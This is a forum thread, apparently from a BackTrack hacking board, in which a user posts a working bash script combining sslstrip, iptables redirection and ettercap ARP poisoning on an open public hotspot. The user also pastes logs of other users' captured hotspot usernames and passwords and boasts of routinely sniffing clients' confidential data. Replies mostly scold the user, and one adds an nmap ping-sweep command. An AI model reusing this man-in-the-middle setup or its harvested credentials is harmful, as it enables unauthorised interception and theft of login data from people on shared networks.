Results 1 to 9 of 9

Thread: problem with ettercap+sslstrip in wlan network.very strange my internet network down.

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Nov 2009
    Posts
    5

    Default

    this is the scenario,
    i am using BT4 prefinal version (USB DEVICE with two partition, FAT and EXT3), i am running it in the wireless network unencrypted security mode for the LAN, which support web based authentication to connect into the internet, ...

    first case is

    my ip assigned as 10.111.111.22
    ip gateway as 10.111.111.254

    but when i scanned to find out alive hosts, i got 254 hosts alive...but i'm not sure about it, since when i'am counting the client on there is just less than 20 person!!
    so i leave this, i try to go into the next step as i usually doing with sslstrip and ettercap!!

    this is my script:
    Code:
     #!/bin/bash          
    OUTFILE="sslstrip"-$(date).txt
    mkdir /mnt/sdb2
    mount /dev/sdb2 /mnt/sdb2
    cd /mnt/sdb2/changes/sslstrip-0.6
    python ./setup.py install
    echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    python ./sslstrip.py -p -l 8080 -w "$OUTFILE"
    ettercap -i wlan0 -Tq -M ARP /10.111.111.254/ // // -P autoadd
    second case is
    if i'am running this scripts, immediately i cannot access internet service, whatever i want to try to access, then the web pages redirect into the login page (need to reauthenticate).

    and when i'm check the sslstrips logs file...i just got this shit stuff

    Code:
    dst=popup=true&username=MEJA+8&password=795540130
    2009-11-24 19:26:58,279 POST Data (hotspot-roemahkopi.net.id):
    dst=%3A%2F%2F%2Freqs.php&popup=true&username=MEJA+8&password=7955401330
    2009-11-24 19:27:41,988 POST Data (hotspot-roemahkopi.net.id):
    dst=%3A%2F%2F%2Freqs.php&popup=true&username=MEJA+8&password=79554030
    2009-11-24 19:28:11,594 POST Data (hotspot-roemahkopi.net.id):
    dst=%3A%2F%2F%2Fhome.php%3F&popup=true&username=&password=m
    2009-11-24 19:28:28,024 POST Data (hotspot-roemahkopi.net.id):
    dst=%3A%2F%2F%2Fhome.php%3F&popup=true&username=MEJA+8&password=795540130
    2009-11-24 19:31:09,254 POST Data (hotspot-roemahkopi.net.id):
    dst=%3A%2F%2F%2Fhome.php%3F&popup=true&username=MEJA+8A&password=992626
    2009-11-24 19:31:41,342 POST Data (hotspot-roemahkopi.net.id):
    dst=%3A%2F%2F%2Fhome.php%3F&popup=true&username=MEJA+8A&password=992626
    nothing i got!!


    what is my problem bro?? i always successfully sniff any confidentials data on all clients if the type of wireless network security not using web based authentication that use username or password to logon!!!

    this is the scenario,
    i am using BT4 prefinal version (USB DEVICE with two partition, FAT and EXT3), i am running it in the wireless network unencrypted security mode for the LAN, which support web based authentication to connect into the internet, ...

    first case is

    my ip assigned as 10.111.111.22
    ip gateway as 10.111.111.254

    but when i scanned to find out alive hosts, i got 254 hosts alive...but i'm not sure about it, since when i'am counting the client on there is just less than 20 person!!
    so i leave this, i try to go into the next step as i usually doing with sslstrip and ettercap!!

    this is my script:
    Code:
    #!/bin/bash          
    OUTFILE="sslstrip"-$(date).txt
    mkdir /mnt/sdb2
    mount /dev/sdb2 /mnt/sdb2
    cd /mnt/sdb2/changes/sslstrip-0.6
    python ./setup.py install
    echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    python ./sslstrip.py -p -l 8080 -w "$OUTFILE"
    ettercap -i wlan0 -Tq -M ARP /10.111.111.254/ // // -P autoadd
    second case is
    if i'am running this scripts, immediately i cannot access internet service, whatever i want to try to access, then the web pages redirect into the login page (need to reauthenticate).

    and when i'm check the sslstrips logs file...i just got this shit stuff
    Code:
    dst=popup=true&username=MEJA+8&password=795540130
    2009-11-24 19:26:58,279 POST Data (hotspot-roemahkopi.net.id):
    dst=%3A%2F%2F%2Freqs.php&popup=true&username=MEJA+8&password=7955401330
    2009-11-24 19:27:41,988 POST Data (hotspot-roemahkopi.net.id):
    dst=%3A%2F%2F%2Freqs.php&popup=true&username=MEJA+8&password=79554030
    2009-11-24 19:28:11,594 POST Data (hotspot-roemahkopi.net.id):
    dst=%3A%2F%2F%2Fhome.php%3F&popup=true&username=&password=m
    2009-11-24 19:28:28,024 POST Data (hotspot-roemahkopi.net.id):
    dst=%3A%2F%2F%2Fhome.php%3F&popup=true&username=MEJA+8&password=795540130
    2009-11-24 19:31:09,254 POST Data (hotspot-roemahkopi.net.id):
    dst=%3A%2F%2F%2Fhome.php%3F&popup=true&username=MEJA+8A&password=992626
    2009-11-24 19:31:41,342 POST Data (hotspot-roemahkopi.net.id):
    dst=%3A%2F%2F%2Fhome.php%3F&popup=true&username=MEJA+8A&password=992626
    i just got user pass data that try to authenticated through web based to get granted access into the internet!!!

    what is my problem bro?? i always successfully sniff any confidentials data on all clients if the type of wireless network security not using web based authentication that use username or password to logon!!!

  2. #2
    prowl3r
    Guest

    Default

    A candidate to join the failbus.

  3. #3
    Just burned his ISO
    Join Date
    Nov 2009
    Posts
    5

    Default

    Quote Originally Posted by prowl3r View Post
    A candidate to join the failbus.
    what u mean buddy with this??

  4. #4
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Quote Originally Posted by paul007 View Post
    what is my problem bro??
    The problem is you're playing with things you don't understand.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  5. #5
    Just burned his ISO
    Join Date
    Nov 2009
    Posts
    5

    Default

    Quote Originally Posted by thorin View Post
    The problem is you're playing with things you don't understand.
    i need more explaination thorin, and i hope u give some link or any tutor to make me understand!!!

    you see this "i always successfully sniff any confidentials data on all clients if the type of wireless network security not using web based authentication that use username or password to logon!!!"

    which part i don't understand???i really need help bro...thanks's in advnce

  6. #6
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Do not create multiple threads on the same topic. Re-read the rules you agreed to.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #7
    Just burned his ISO
    Join Date
    Nov 2009
    Posts
    5

    Default

    Quote Originally Posted by archangel.amael View Post
    Do not create multiple threads on the same topic. Re-read the rules you agreed to.
    sorry guys...i really hope there's any solution or suggestion with this problem..

  8. #8
    Just burned his ISO
    Join Date
    Apr 2009
    Posts
    17

    Default

    i will entertain this... for a bit.

    ping sweep:
    #nmap -sP 10.111.111.1-255

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •